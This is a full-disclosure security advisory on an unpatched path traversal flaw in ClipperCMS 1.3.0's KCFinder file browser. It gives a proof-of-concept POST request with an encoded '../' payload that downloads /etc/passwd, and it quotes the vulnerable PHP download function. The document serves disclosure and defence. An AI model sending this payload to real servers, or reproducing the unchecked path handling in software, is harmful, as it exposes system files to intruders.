Security Advisory - Curesec Research Team 1. Introduction Affected Product: ClipperCMS 1.3.0 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://www.clippercms.com/ Vulnerability Type: Path Traversal Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N Description The "file" Parameter of the file browser is vulnerable to directory traversal, allowing the download of arbitrary files. A user account is needed with at least the lowest default role, which is "Editor". 3. Proof of Concept POST /ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1 dir=images&file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 4. Code /ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/core/browser.php protected function act_download() { $dir = $this->postDir(); if (!isset($this->post['dir']) || !isset($this->post['file']) || (false === ($file = "$dir/{$this->post['file']}")) || !file_exists($file) || !is_readable($file) ) $this->errorMsg("Unknown error."); header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header("Cache-Control: private", false); header("Content-Type: application/octet-stream"); header('Content-Disposition: attachment; filename="' . str_replace('"', "_", $this->post['file']) . '"'); header("Content-Transfer-Encoding: binary"); header("Content-Length: " . filesize($file)); readfile($file); die; } 5. Solution This issue has not been fixed by the vendor. 6. Report Timeline 10/02/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/ClipperCMS-130-Path-Traversal-98.html